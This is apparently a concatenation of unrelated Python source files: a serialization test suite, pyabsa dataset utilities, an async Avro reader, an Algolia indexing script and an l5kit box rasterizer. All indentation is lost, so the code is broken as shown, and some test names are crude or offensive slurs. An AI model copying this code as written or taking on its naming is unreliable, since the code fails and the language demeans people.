class blah(object):
junk = 'whee'
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_class_packunpack():
p = fu.package.pack(A)
result = fu.package.unpack(p)
if result.__name__ == 'A':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(B)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_derived_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method_c1() == 'C1' and result().method() == 'B':
raise Success
@TestCase
def test_multiinheritance_packunpack():
p = fu.package.pack(D)
result = fu.package.unpack(p)
if result().method_c1() == 'D' and result().method_c2() == 'C2':
raise Success
@TestCase
def test_python_gay():
class test(object):
def fiver(self):
return 5
class test2(test):
def tenor(self):
return 10
a = test2()
identity = id(a.tenor) == id(a.fiver)
if identity is not True:
raise AssertionError('yay, your python isn\'t lying about id being unique')
if a.tenor() != a.fiver():
raise Success
@TestCase
def test_func_closure():
def fn(a1, a2):
def closure(a3):
return (a1+a2)*a3
return closure
a = fn(1, 2)
b = fu.package.pack(a)
c = fu.package.unpack(b)
if a(222) == int(c('6')):
raise Success
# @TestCase # FIXME
def test_unknown_type():
# error while serializing a 'TypeInfo' object which comes from a module implemented in C
# if we can
import xml.dom.minidom
a = fu.package.pack(xml.dom.minidom)
b = fu.package.unpack(a)
@TestCase
def test_inheritance_native():
class blah([].__class__): pass
x = blah()
x.append(5)
a = fu.package.pack(x)
b = fu.package.unpack(a)
if len(x) == len(b):
raise Success
@TestCase
def test_const_list():
t = type([])
a = fu.package.pack(t)
b = fu.package.unpack(a)
if b is t:
raise Success
@TestCase
def test_type_intbool():
v = 1
a = fu.package.pack(v)
b = fu.package.unpack(a)
if b == v and type(b) == type(v):
raise Success
@TestCase
def test_module_builtin():
import sys
a = fu.pack(sys)
b = fu.unpack(a)
if b is sys:
raise Success
@TestCase
def test_module_general():
import re
a = re.compile('fuckyou', 0)
b = fu.pack(a)
c = fu.unpack(b)
if id(b) != id(c) if sys.version_info.major < 3 else c is not a:
raise Success
# @TestCase
def test_module():
import fu
a = fu.package.pack(fu)
b = fu.package.unpack(a)
if b.VERSION == fu.VERSION and b is not fu:
raise Success
# @TestCase
def test_ignore_modulepack():
import sys
a = fu.package.pack(sys, local=('sys',))
_, x, y = a
if y[0][x][0] is not fu.module.id:
raise Failure
b = fu.package.unpack(a)
if sys.winver is b.winver:
raise Success
# @TestCase
def test_ignore_moduleunpack():
import _ast as testpackage
a = fu.package.pack(testpackage)
_, x, y = a
if y[0][x][0] is not fu.module_.id:
raise Failure
b = fu.package.unpack(a, local=('_ast',))
if b is testpackage:
raise Success
#@TestCase
def test_ptype_pack():
from ptypes import pint
a = pint.uint32_t()
a.setoffset(id(builtins.type))
result = a.l.value
b = fu.package.unpack(fu.package.pack(a))
if b.value == result:
raise Success
#@TestCase
def test_continuation_yield():
def fn():
yield 1
yield 2
global a, b, c
a = fn()
if a.next() != 1:
raise AssertionError
b = fu.package.pack(a)
c = fu.package.unpack(b)
if c.next() == 2:
raise Success
@TestCase
def test_weakref_packunpack():
import fu, _weakref
a = set(('hello', ))
b = _weakref.ref(a)
c = fu.pack(b)
d = fu.unpack(c)
if list(b()) == list(d()):
raise Success
@TestCase
def test_super_packunpack():
import fu
class blah({item for item in []}.__class__):
def huh(self):
return 5
class blahsub(blah):
def huh(self):
return super(blahsub, self)
# FIXME: this is busted in python2
a = blahsub((20, 40, 60))
b = a.huh()
c = fu.pack(b)
d = fu.unpack(c)
if d.huh() == b.huh():
raise Success
@TestCase
def test_threadlock_packunpack():
import _thread, fu
a = _thread.allocate_lock()
b = fu.pack(a)
c = fu.unpack(b)
if a.__class__ == c.__class__:
raise Success
@TestCase
def test_object_instance_packunpack():
import fu
a = object()
b = fu.pack(a)
c = fu.unpack(b)
if type(a) == type(c) and isinstance(c, type(a)):
raise Success
@TestCase
def test_instancevalue_slots_packunpack():
import fu
class mytype(object):
__slots__ = ['blargh', 'huh']
readonly = 20
#blargh = 500
#huh = 20
a = mytype()
b = fu.unpack(fu.pack(a))
try:
b.blargh = 500
b.huh = 500
except AttributeError:
raise Failure("Unable to assign to slots")
try:
b.readonly = 20
raise Failure("Successfully assigned to a readonly property")
except AttributeError:
pass
try:
b.nope = None
raise Failure("Assigned a property to a __dict__ instead of an allocated slot")
except AttributeError:
pass
if b.blargh == b.huh == 500 and b.readonly == 20:
raise Success
@TestCase
def test_operator_partial():
def fucker(x, y, z):
return x * y + z
f = functools.partial(fucker, 2, 3)
g = fu.unpack(fu.pack(f))
if f(1) == g(1):
raise Success
@TestCase
def test_operator_attrgetter_0():
class t(object):
mine = 5
f = operator.attrgetter('mine')
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_attrgetter_1():
f = operator.attrgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_attrgetter_2():
f = operator.attrgetter('this.is.a.deep', 'one.and.this.one.too')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['this.is.a.deep', 'one.and.this.one.too']:
raise Success
@TestCase
def test_operator_itemgetter_0():
x = {'mine': 5}
f = operator.itemgetter('mine')
g = fu.unpack(fu.pack(f))
if f(x) == g(x):
raise Success
@TestCase
def test_operator_itemgetter_1():
f = operator.itemgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_methodcaller_0():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', 3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_1():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', x=3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_2():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', 3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_3():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', x=3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_0():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, 5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_1():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_2():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', x=20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
if __name__ == '__main__':
results = []
for t in TestCaseList:
results.append( t() )
if __name__ == 'bootstrap':
import importlib, fu
from fu import package
## figure out which type methods we need
st = package.stash()
n = st.store(package)
t1 = set()
t1.update(n for n, _ in st.cons_data.values())
t1.update(n for n, _ in st.inst_data.values())
print(len(t1))
[st.store(fu.package.cache.byid(n)) for n in t]
t2 = set()
t2.update(n for n, _ in st.cons_data.values())
t2.update(n for n, _ in st.inst_data.values())
print(len(t2))
print(sum(map(len, (fu.package.cache.registration.id, fu.package.cache.registration.type, fu.package.cache.registration.const))))
t = t2
mymethod = type(fu.function.new)
myfunc = type(fu.function.new.im_func)
## serialize the stash methods
stashed_up, stashed_fe = (getattr(st, attr).im_func.func_code for attr in ['unpack_references', 'fetch'])
res = stashed_up, stashed_fe, st.packed()
#marshal.dumps(res)
class mystash:
cons_data = {}
inst_data = {}
def fetch(self, identity, **attributes):
_, data = self.cons_data[identity]
cls, data = self.byid(_), self.unpack_references(data, **attributes)
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
_, data = self.inst_data[identity]
cls, data = self.byid(_), self.unpack_References(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError
return instance
mystash.unpack_references = myfunc(stashed_up, namespace)
mystash.fetch = myfunc(stashed_fe, namespace)
x = mystash()
x.cons_data, x.inst_data = st.packed()
## serialize the necessary type methods
classes = [(n, fu.package.cache.byid(n)) for n in t]
methods = [(n, (cls.__name__, cls.new.im_func.func_code, cls.getclass.im_func.func_code, cls.u_constructor.im_func.func_code, cls.u_instance.im_func.func_code)) for n, cls in classes]
marshal.dumps(methods)
## ensure that we can recreate all these type methods
result, namespace = {}, {}
namespace['thread'] = importlib.import_module('thread')
namespace['imp'] = importlib.import_module('imp')
namespace['_weakref'] = importlib.import_module('_weakref')
for n, (name, new, get, cons, inst) in methods:
objspace = {
'new' : myfunc(new, namespace),
'getclass' : myfunc(get, namespace),
'u_constructor' : myfunc(cons, namespace),
'u_instance' : myfunc(inst, namespace),
}
o = type(name, (object,), objspace)()
result[n] = namespace[name] = o
#for attr in ['func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']:
#for n, (new, cons, inst) in methods:
# if any(x.func_closure is not None for x in [cons, inst]):
# raise Exception(n)
# if any(x.func_defaults is not None for x in [cons, inst]):
# raise Exception(n)
# if any(len(x.func_dict) != 0 for x in [cons, inst]):
# raise Exception(n)
# for attr in ['func_code', 'func_name']:
# print(n, attr, repr(getattr(cons, attr)))
# print(n, attr, repr(getattr(inst, attr)))
consdata = st.cons_data
instances = {}
for _, (t, v) in consdata.items():
result[t].u_constructor(v, globals=namespace)
|
the-stack_0_25286
|
# -*- coding: utf-8 -*-
# file: file_utils.py
# time: 2021/7/13 0020
# author: yangheng <[email protected]>
# github: https://github.com/yangheng95
# Copyright (C) 2021. All Rights Reserved.
import copy
import json
import os
import pickle
import urllib.request
import torch
from findfile import find_files, find_dir
from google_drive_downloader import GoogleDriveDownloader as gdd
from pyabsa.core.atepc.dataset_utils.atepc_utils import split_text
from termcolor import colored
from pyabsa import __version__
# convert atepc_datasets in this repo for inferring_tutorials
from pyabsa.functional.dataset import DatasetItem
from pyabsa.utils.pyabsa_utils import save_args
def generate_inference_set_for_apc(dataset_path):
if isinstance(dataset_path, DatasetItem):
dataset_path = dataset_path.dataset_name
elif not os.path.exists(dataset_path):
dataset_path = os.getcwd()
train_datasets = find_files(dataset_path, ['dataset', 'train', 'apc'], exclude_key='.inference')
test_datasets = find_files(dataset_path, ['dataset', 'test', 'apc'], exclude_key='.inference')
for file in train_datasets + test_datasets:
try:
fin = open(file, 'r', newline='\n', encoding='utf-8')
lines = fin.readlines()
fin.close()
path_to_save = file + '.inference'
fout = open(path_to_save, 'w', encoding='utf-8', newline='\n', errors='ignore')
for i in range(0, len(lines), 3):
sample = lines[i].strip().replace('$T$', '[ASP]{}[ASP]'.format(lines[i + 1].strip()))
fout.write(sample + ' !sent! ' + lines[i + 2].strip() + '\n')
fout.close()
except:
print('Unprocessed file:', file)
print('save in: {}'.format(path_to_save))
print('process finished')
def is_similar(s1, s2):
count = 0.0
for token in s1.split(' '):
if token in s2:
count += 1
if count / len(s1.split(' ')) >= 0.8 and count / len(s2.split(' ')) >= 0.8:
return True
else:
return False
def assemble_aspects(fname):
fin = open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
lines = fin.readlines()
fin.close()
for i in range(len(lines)):
if i % 3 == 0 or i % 3 == 1:
lines[i] = ' '.join(split_text(lines[i].strip())).replace('$ t $', '$T$')
else:
lines[i] = lines[i].strip()
def unify_same_samples(same_samples):
text = same_samples[0][0].replace('$T$', same_samples[0][1])
polarities = [-999] * len(text.split())
tags = ['O'] * len(text.split())
samples = []
for sample in same_samples:
# print(sample)
polarities_tmp = copy.deepcopy(polarities)
try:
asp_begin = (sample[0].split().index('$T$'))
asp_end = sample[0].split().index('$T$') + len(sample[1].split())
for i in range(asp_begin, asp_end):
polarities_tmp[i] = sample[2]
if i - sample[0].split().index('$T$') < 1:
tags[i] = 'B-ASP'
else:
tags[i] = 'I-ASP'
samples.append([text, tags, polarities_tmp])
except:
print('Ignore Error:', sample[0])
return samples
samples = []
aspects_in_one_sentence = []
for i in range(0, len(lines), 3):
lines[i] = lines[i].replace('$T$', ' $T$ ').replace(' ', ' ')
if len(aspects_in_one_sentence) == 0:
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
continue
if is_similar(aspects_in_one_sentence[-1][0], lines[i]):
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
else:
samples.extend(unify_same_samples(aspects_in_one_sentence))
aspects_in_one_sentence = []
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
samples.extend(unify_same_samples(aspects_in_one_sentence))
return samples
def split_aspects(sentence):
single_aspect_with_contex = []
aspect_num = len(sentence[1].split("|"))
aspects = sentence[1].split("|")
polarity = sentence[2].split("|")
pre_position = 0
aspect_context = sentence[0]
for i in range(aspect_num):
aspect_context = aspect_context.replace("$A$", aspects[i], 1)
single_aspect_with_contex.append(
(aspect_context[pre_position:aspect_context.find("$A$")], aspects[i], polarity[i]))
pre_position = aspect_context.find(aspects[i]) + len(aspects[i]) + 1
return single_aspect_with_contex
def convert_atepc(fname):
print('converting:', fname)
dist_fname = fname.replace('apc_datasets', 'atepc_datasets') + '.atepc'
lines = []
samples = assemble_aspects(fname)
for sample in samples:
for token_index in range(len(sample[1])):
token, label, polarity = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
lines.append(token + " " + label + " " + str(polarity))
lines.append('\n')
# 写之前,先检验文件是否存在,存在就删掉
if os.path.exists(dist_fname):
os.remove(dist_fname)
fout = open(dist_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
# 将数据集中的aspect切割出来
def convert_apc_set_to_atepc_set(path):
if isinstance(path, DatasetItem):
path = path.dataset_name
if not os.path.exists(path):
files = find_files(os.getcwd(), [path, 'dataset', 'apc'], exclude_key='.inference')
else:
files = find_files(path, '', exclude_key='infer')
print('Find datasets files at {}:'.format(path))
for f in files:
print(f)
for target_file in files:
if not (target_file.endswith('.inference') or target_file.endswith('.atepc')):
try:
convert_atepc(target_file)
except:
print('failed to process"{}'.format(target_file))
else:
print('Ignore ', target_file)
print('finished')
# 将数据集中的aspect切割出来
def refactor_chinese_dataset(fname, train_fname, test_fname):
lines = []
samples = assemble_aspects(fname)
positive = 0
negative = 0
sum = 0
# refactor testset
for sample in samples[:int(len(samples) / 5)]:
for token_index in range(len(sample[1])):
token, label, polarty = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
lines.append(token + " " + label + " " + str(polarty))
lines.append('\n')
if 1 in sample[2]:
positive += 1
else:
negative += 1
sum += 1
print(train_fname + f"sum={sum} positive={positive} negative={negative}")
if os.path.exists(test_fname):
os.remove(test_fname)
fout = open(test_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
positive = 0
negative = 0
sum = 0
# refactor trainset
for sample in samples[int(len(samples) / 5):]:
for token_index in range(len(sample[1])):
tokens = sample[0].split()
token, label, polarty = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
lines.append(token + " " + label + " " + str(polarty))
lines.append('\n')
if 1 in sample[2]:
positive += 1
else:
negative += 1
sum += 1
print(train_fname + f"sum={sum} positive={positive} negative={negative}")
if os.path.exists(train_fname):
os.remove(train_fname)
fout = open(train_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
def detect_error_in_dataset(dataset):
f = open(dataset, 'r', encoding='utf8')
lines = f.readlines()
for i in range(0, len(lines), 3):
# print(lines[i].replace('$T$', lines[i + 1].replace('\n', '')))
if i + 3 < len(lines):
if is_similar(lines[i], lines[i + 3]) and len((lines[i] + " " + lines[i + 1]).split()) != len(
(lines[i + 3] + " " + lines[i + 4]).split()):
print(lines[i].replace('$T$', lines[i + 1].replace('\n', '')))
print(lines[i + 3].replace('$T$', lines[i + 4].replace('\n', '')))
def save_model(opt, model, tokenizer, save_path):
if not opt.save_mode:
return
# Save a trained model, configuration and tokenizer
if hasattr(model, 'module') or hasattr(model, 'core'):
# print("save model from data-parallel!")
model_to_save = model.module
else:
# print("save a single cuda model!")
model_to_save = model
if opt.save_mode == 1 or opt.save_mode == 2:
if not os.path.exists(save_path):
os.makedirs(save_path)
f_config = open(save_path + opt.model_name + '.config', mode='wb')
f_tokenizer = open(save_path + opt.model_name + '.tokenizer', mode='wb')
pickle.dump(opt, f_config)
pickle.dump(tokenizer, f_tokenizer)
f_config.close()
f_tokenizer.close()
save_args(opt, save_path + opt.model_name + '.args.txt')
if opt.save_mode == 1:
torch.save(model_to_save.state_dict(), save_path + opt.model_name + '.state_dict') # save the state dict
elif opt.save_mode == 2:
torch.save(model.cpu(), save_path + opt.model_name + '.model') # save the state dict
elif opt.save_mode == 3:
# save the fine-tuned bert model
model_output_dir = save_path + '-fine-tuned-bert'
if not os.path.exists(model_output_dir):
os.makedirs(model_output_dir)
output_model_file = os.path.join(model_output_dir, 'pytorch_model.bin')
output_config_file = os.path.join(model_output_dir, 'bert_config.json')
torch.save(model_to_save.state_dict(), output_model_file)
model_to_save.config.to_json_file(output_config_file)
tokenizer.save_vocabulary(model_output_dir)
else:
raise ValueError('Invalid save_mode: {}'.format(opt.save_mode))
model.to(opt.device)
def check_update_log():
try:
if os.path.exists('./release_note.json'):
os.remove('./release_note.json')
gdd.download_file_from_google_drive('1nOppewL8L1mGy9i6HQnJrEWrfaqQhC_2', './release-note.json')
update_logs = json.load(open('release-note.json'))
for v in update_logs:
if v > __version__:
print(colored('*' * 20 + ' Release Note of Version {} '.format(v) + '*' * 20, 'green'))
for i, line in enumerate(update_logs[v]):
print('{}.\t{}'.format(i + 1, update_logs[v][line]))
except Exception as e:
print(colored('Fail to load release note: {}, you can check it on https://github.com/yangheng95/PyABSA/blob/release/release-note.json'.format(e), 'red'))
def check_dataset(dataset_path='./integrated_datasets', retry_count=3): # retry_count is for unstable conn to GitHub
try:
local_version = open(os.path.join(dataset_path, '__init__.py')).read().split('\'')[-2]
if retry_count:
def query_datasets():
dataset_url = 'https://raw.githubusercontent.com/yangheng95/ABSADatasets/master/datasets/__init__.py'
content = urllib.request.urlopen(dataset_url, timeout=int(5 / retry_count))
version = content.read().decode("utf-8").split('\'')[-2]
return version
try:
result = query_datasets() > local_version
if result:
print(colored('There is a new version of ABSADatasets, please remove the downloaded datasets to automatically download the new version.', 'green'))
except Exception:
retry_count -= 1
check_dataset(retry_count=retry_count)
except Exception as e:
if find_dir('integrated_datasets'):
print(colored('ABSADatasets version check failed, please check the latest datasets on GitHub manually.', 'red'))
|
the-stack_0_25287
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Read/Write Avro File Object Containers."""
import logging
import sys
from ..avro import avro_io_async
from ..avro import schema
from .datafile import DataFileException
from .datafile import MAGIC, SYNC_SIZE, META_SCHEMA, SCHEMA_KEY
PY3 = sys.version_info[0] == 3
logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# Constants
# Codecs supported by container files:
VALID_CODECS = frozenset(['null'])
class AsyncDataFileReader(object):
"""Read files written by DataFileWriter."""
def __init__(self, reader, datum_reader, **kwargs):
"""Initializes a new data file reader.
Args:
reader: Open file to read from.
datum_reader: Avro datum reader.
"""
self._reader = reader
self._raw_decoder = avro_io_async.AsyncBinaryDecoder(reader)
self._header_reader = kwargs.pop('header_reader', None)
self._header_decoder = None if self._header_reader is None else \
avro_io_async.AsyncBinaryDecoder(self._header_reader)
self._datum_decoder = None # Maybe reset at every block.
self._datum_reader = datum_reader
self.codec = "null"
self._block_count = 0
self._meta = None
self._sync_marker = None
async def init(self):
# In case self._reader only has partial content(without header).
# seek(0, 0) to make sure read the (partial)content from beginning.
await self._reader.seek(0, 0)
# read the header: magic, meta, sync
await self._read_header()
# ensure codec is valid
avro_codec_raw = self.get_meta('avro.codec')
if avro_codec_raw is None:
self.codec = "null"
else:
self.codec = avro_codec_raw.decode('utf-8')
if self.codec not in VALID_CODECS:
raise DataFileException('Unknown codec: %s.' % self.codec)
# get ready to read
self._block_count = 0
# header_reader indicates reader only has partial content. The reader doesn't have block header,
# so we read use the block count stored last time.
# Also ChangeFeed only has codec==null, so use _raw_decoder is good.
if self._header_reader is not None:
self._block_count = self._reader.block_count
self._datum_decoder = self._raw_decoder
self.datum_reader.writer_schema = (
schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8')))
return self
async def __aenter__(self):
return self
async def __aexit__(self, data_type, value, traceback):
# Perform a close if there's no exception
if data_type is None:
self.close()
def __aiter__(self):
return self
# read-only properties
@property
def reader(self):
return self._reader
@property
def raw_decoder(self):
return self._raw_decoder
@property
def datum_decoder(self):
return self._datum_decoder
@property
def datum_reader(self):
return self._datum_reader
@property
def sync_marker(self):
return self._sync_marker
@property
def meta(self):
return self._meta
# read/write properties
@property
def block_count(self):
return self._block_count
def get_meta(self, key):
"""Reports the value of a given metadata key.
Args:
key: Metadata key (string) to report the value of.
Returns:
Value associated to the metadata key, as bytes.
"""
return self._meta.get(key)
async def _read_header(self):
header_reader = self._header_reader if self._header_reader else self._reader
header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder
# seek to the beginning of the file to get magic block
await header_reader.seek(0, 0)
# read header into a dict
header = await self.datum_reader.read_data(META_SCHEMA, header_decoder)
# check magic number
if header.get('magic') != MAGIC:
fail_msg = "Not an Avro data file: %s doesn't match %s." \
% (header.get('magic'), MAGIC)
raise schema.AvroException(fail_msg)
# set metadata
self._meta = header['meta']
# set sync marker
self._sync_marker = header['sync']
async def _read_block_header(self):
self._block_count = await self.raw_decoder.read_long()
if self.codec == "null":
# Skip a long; we don't need to use the length.
await self.raw_decoder.skip_long()
self._datum_decoder = self._raw_decoder
else:
raise DataFileException("Unknown codec: %r" % self.codec)
async def _skip_sync(self):
"""
Read the length of the sync marker; if it matches the sync marker,
return True. Otherwise, seek back to where we started and return False.
"""
proposed_sync_marker = await self.reader.read(SYNC_SIZE)
if SYNC_SIZE > 0 and not proposed_sync_marker:
raise StopAsyncIteration
if proposed_sync_marker != self.sync_marker:
await self.reader.seek(-SYNC_SIZE, 1)
async def __anext__(self):
"""Return the next datum in the file."""
if self.block_count == 0:
await self._skip_sync()
await self._read_block_header()
datum = await self.datum_reader.read(self.datum_decoder)
self._block_count -= 1
# event_position and block_count are to support reading from current position in the future read,
# no need to downloading from the beginning of avro file with these two attr.
if hasattr(self._reader, 'event_position'):
self.reader.block_count = self.block_count
await self.reader.track_event_position()
return datum
def close(self):
"""Close this reader."""
self.reader.close()
if __name__ == '__main__':
raise Exception('Not a standalone module')
|
the-stack_0_25289
|
#!/usr/bin/python
import os
from algoliasearch import algoliasearch
from parser import getDataFromUrlInFile, getDataSingleObject
client = algoliasearch.Client(
os.environ["APPID_ALGOLIA"], os.environ["APIKEY_ALGOLIA"])
index = client.init_index(os.environ["INDEX_ALGOLIA"])
def cleanBeforeFilling():
try:
ids = []
res = index.browse_all({"query": ""})
for hit in res:
ids.append(hit["objectID"])
index.delete_objects(ids)
return "done"
except Exception as e:
return str(e)
def pushNewIndexs():
try:
getDataFromUrlInFile(
"https://raw.githubusercontent.com/sindresorhus/awesome/master/readme.md")
file = open("readme.md", "r")
res = getDataSingleObject(file)
index.add_objects(res)
file.close()
return "done"
except Exception as e:
return str(e)
|
the-stack_0_25291
|
from typing import List, Optional, Tuple, Union
import cv2
import numpy as np
from l5kit.data.zarr_dataset import AGENT_DTYPE
from ..data.filter import filter_agents_by_labels, filter_agents_by_track_id
from ..geometry import rotation33_as_yaw, transform_points
from ..geometry.transform import yaw_as_rotation33
from .rasterizer import EGO_EXTENT_HEIGHT, EGO_EXTENT_LENGTH, EGO_EXTENT_WIDTH, Rasterizer
from .render_context import RenderContext
from .semantic_rasterizer import CV2_SHIFT, cv2_subpixel
def get_ego_as_agent(frame: np.ndarray) -> np.ndarray: # TODO this can be useful to have around
"""
Get a valid agent with information from the frame AV. Ford Fusion extent is used
Args:
frame (np.ndarray): the frame we're interested in
Returns: an agent np.ndarray of the AV
"""
ego_agent = np.zeros(1, dtype=AGENT_DTYPE)
ego_agent[0]["centroid"] = frame["ego_translation"][:2]
ego_agent[0]["yaw"] = rotation33_as_yaw(frame["ego_rotation"])
ego_agent[0]["extent"] = np.asarray((EGO_EXTENT_LENGTH, EGO_EXTENT_WIDTH, EGO_EXTENT_HEIGHT))
return ego_agent
def draw_boxes(
raster_size: Tuple[int, int],
raster_from_world: np.ndarray,
agents: np.ndarray,
color: Union[int, Tuple[int, int, int]],
) -> np.ndarray:
"""
Draw multiple boxes in one sweep over the image.
Boxes corners are extracted from agents, and the coordinates are projected in the image plane.
Finally, cv2 draws the boxes.
Args:
raster_size (Tuple[int, int]): Desired output image size
world_to_image_space (np.ndarray): 3x3 matrix to convert from world to image coordinated
agents (np.ndarray): array of agents to be drawn
color (Union[int, Tuple[int, int, int]]): single int or RGB color
Returns:
np.ndarray: the image with agents rendered. RGB if color RGB, otherwise GRAY
"""
if isinstance(color, int):
im = np.zeros((raster_size[1], raster_size[0]), dtype=np.uint8)
else:
im = np.zeros((raster_size[1], raster_size[0], 3), dtype=np.uint8)
box_world_coords = np.zeros((len(agents), 4, 2))
corners_base_coords = np.asarray([[-1, -1], [-1, 1], [1, 1], [1, -1]])
# compute the corner in world-space (start in origin, rotate and then translate)
for idx, agent in enumerate(agents):
corners = corners_base_coords * agent["extent"][:2] / 2 # corners in zero
r_m = yaw_as_rotation33(agent["yaw"])
box_world_coords[idx] = transform_points(corners, r_m) + agent["centroid"][:2]
box_raster_coords = transform_points(box_world_coords.reshape((-1, 2)), raster_from_world)
# fillPoly wants polys in a sequence with points inside as (x,y)
box_raster_coords = cv2_subpixel(box_raster_coords.reshape((-1, 4, 2)))
cv2.fillPoly(im, box_raster_coords, color=color, lineType=cv2.LINE_AA, shift=CV2_SHIFT)
return im
class BoxRasterizer(Rasterizer):
def __init__(
self, render_context: RenderContext, filter_agents_threshold: float, history_num_frames: int,
):
"""
Args:
render_context (RenderContext): Render context
filter_agents_threshold (float): Value between 0 and 1 used to filter uncertain agent detections
history_num_frames (int): Number of frames to rasterise in the past
"""
super(BoxRasterizer, self).__init__()
self.render_context = render_context
self.raster_size = render_context.raster_size_px
self.filter_agents_threshold = filter_agents_threshold
self.history_num_frames = history_num_frames
def rasterize(
self,
history_frames: np.ndarray,
history_agents: List[np.ndarray],
history_tl_faces: List[np.ndarray],
agent: Optional[np.ndarray] = None,
) -> np.ndarray:
# all frames are drawn relative to this one"
frame = history_frames[0]
if agent is None:
ego_translation_m = history_frames[0]["ego_translation"]
ego_yaw_rad = rotation33_as_yaw(frame["ego_rotation"])
else:
ego_translation_m = np.append(agent["centroid"], history_frames[0]["ego_translation"][-1])
ego_yaw_rad = agent["yaw"]
raster_from_world = self.render_context.raster_from_world(ego_translation_m, ego_yaw_rad)
# this ensures we always end up with fixed size arrays, +1 is because current time is also in the history
out_shape = (self.raster_size[1], self.raster_size[0], self.history_num_frames + 1)
agents_images = np.zeros(out_shape, dtype=np.uint8)
ego_images = np.zeros(out_shape, dtype=np.uint8)
for i, (frame, agents) in enumerate(zip(history_frames, history_agents)):
agents = filter_agents_by_labels(agents, self.filter_agents_threshold)
# note the cast is for legacy support of dataset before April 2020
av_agent = get_ego_as_agent(frame).astype(agents.dtype)
if agent is None:
agents_image = draw_boxes(self.raster_size, raster_from_world, agents, 255)
ego_image = draw_boxes(self.raster_size, raster_from_world, av_agent, 255)
else:
agent_ego = filter_agents_by_track_id(agents, agent["track_id"])
if len(agent_ego) == 0: # agent not in this history frame
agents_image = draw_boxes(self.raster_size, raster_from_world, np.append(agents, av_agent), 255)
ego_image = np.zeros_like(agents_image)
else: # add av to agents and remove the agent from agents
agents = agents[agents != agent_ego[0]]
agents_image = draw_boxes(self.raster_size, raster_from_world, np.append(agents, av_agent), 255)
ego_image = draw_boxes(self.raster_size, raster_from_world, agent_ego, 255)
agents_images[..., i] = agents_image
ego_images[..., i] = ego_image
# combine such that the image consists of [agent_t, agent_t-1, agent_t-2, ego_t, ego_t-1, ego_t-2]
out_im = np.concatenate((agents_images, ego_images), -1)
return out_im.astype(np.float32) / 255
def to_rgb(self, in_im: np.ndarray, **kwargs: dict) -> np.ndarray:
"""
get an rgb image where agents further in the past have faded colors
Args:
in_im: the output of the rasterize function
kwargs: this can be used for additional customization (such as colors)
Returns: an RGB image with agents and ego coloured with fading colors
"""
hist_frames = in_im.shape[-1] // 2
in_im = np.transpose(in_im, (2, 0, 1))
